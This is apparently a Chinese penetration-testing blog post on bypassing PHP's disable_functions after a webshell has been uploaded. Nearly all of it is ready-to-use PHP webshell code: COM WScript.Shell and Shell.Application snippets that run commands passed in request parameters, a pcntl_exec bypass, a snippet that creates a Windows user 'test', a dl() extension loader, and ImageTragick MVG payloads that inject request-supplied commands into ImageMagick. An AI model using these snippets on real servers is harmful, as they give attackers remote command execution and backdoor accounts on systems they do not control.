姿势分享——PHP函数禁用绕过浅谈

gclome

原文链接：姿势分享——PHP函数禁用绕过浅谈

在渗透测试过程中可能经常会遇到上传webshell后，由于php.ini配置禁用了一些如exec()，shell_exec()，system()等执行系统命令的函数，导致无法执行系统命令，就此问题给出几种绕过方法。



话不多说，直接贴代码：

1. <?php
   
2. $phpwsh=new COM("Wscript.Shell") or die("Create Wscript.Shell Failed!");  
   
3. $exec=$phpwsh->exec("cmd.exe /c ".$_GET['c']."");  
   
4. $stdout = $exec->StdOut();  
   
5. $stroutput = $stdout->ReadAll();  
   
6. echo $stroutput;  
   
7. ?>

复制代码

1. <?php
   
2. 
   
3. header("Content-Type: text/plain");
   
4. 
   
5. $cmd="/tmp/exec";
   
6. @unlink($cmd);
   
7. $c = "#!/usr/bin/env bash\n".$_GET[x]."> /tmp/output.txt\n";
   
8. file_put_contents($cmd, $c);
   
9. chmod($cmd, 0777);
   
10. $cd="/tmp/output.txt";
    
11. print_r(file_get_contents($cd));
    
12. 
    
13. switch (pcntl_fork()) {
    
14. 
    
15.   case 0:
    
16. 
    
17.     $ret = pcntl_exec($cmd);
    
18. 
    
19.     exit("case 0");
    
20. 
    
21.   default:
    
22. 
    
23.     echo "case 1";
    
24. 
    
25.     break;
    
26. 
    
27. }

复制代码

1. <?php
   
2. $phpwsh=new COM("Shell.Application") or die("Create Wscript.Shell Failed!");
   
3. $exec=$phpwsh->ShellExecute("net"," user test test /add");
   
4. //$exec=$phpwsh->ShellExecute("cmd","/c net user test test /add");
   
5. ?>

复制代码

1. <?php
   
2. $phpwsh=new COM("Shell.Application") or die("Create Wscript.Shell Failed!");
   
3. $exec=$phpwsh->open("c:\\windows\\system32\\cmd.exe");
   
4. ?>

复制代码

1. <?php
   
2. $a=new COM("Shell.Application");
   
3. $a->NameSpace("C:\Windows\System32")->Items()->item("cmd.exe")->invokeverb();
   
4. ?>

复制代码

1. <?php
   
2. $a=new COM("Shell.Application");
   
3. $a->NameSpace("C:\Windows\System32")->Items()->item("cmd.exe")->invokeverbEx();
   
4. ?>

复制代码

1. <?php
   
2. $command=$_POST[a];
   
3. $wsh = new COM('WScript.shell');   // 生成一个COM对象
   
4. $exec = $wsh->exec('cmd.exe /c '.$command); //调用对象方法来执行命令
   
5. $stdout = $exec->StdOut();
   
6. $stroutput = $stdout->ReadAll();
   
7. echo $stroutput
   
8. ?>

复制代码

1. <?php
   
2. dl("dl.so");  //dl.so在extension_dir目录，如不在则用../../来实现调用
   
3. confirm_dl_compiled("$_GET[a]>1.txt");
   
4. ?>

复制代码

1. <?php
   
2. echo "Disable Functions: " . ini_get('disable_functions') . "\n";
   
3. 
   
4. $command = PHP_SAPI == 'cli' ? $argv[1] : $_GET['cmd'];
   
5. if ($command == '') {
   
6.     $command = 'id';
   
7. }
   
8. 
   
9. $exploit = <<<EOF
   
10. push graphic-context
    
11. viewbox 0 0 640 480
    
12. fill 'url(https://example.com/image.jpg"|$command")'
    
13. pop graphic-context
    
14. EOF;
    
15. 
    
16. file_put_contents("KKKK.mvg", $exploit);
    
17. $thumb = new Imagick();
    
18. $thumb->readImage('KKKK.mvg');
    
19. $thumb->writeImage('KKKK.png');
    
20. $thumb->clear();
    
21. $thumb->destroy();
    
22. unlink("KKKK.mvg");
    
23. unlink("KKKK.png");
    
24. ?>

复制代码

1. <?php
   
2. $c=$_REQUEST['c'];
   
3. $e = <<<EOF
   
4. push graphic-context
   
5. viewbox 0 0 640 480
   
6. fill 'url(https://"|$c")'
   
7. pop graphic-context
   
8. EOF;
   
9. $i = new Imagick();
   
10. $i->readImageBlob($e);
    
11. ?>

复制代码

如果您觉得文章对您有帮助，点下关注不迷路，日常分享渗透测试骚姿势，我们的成长离不开您的陪伴。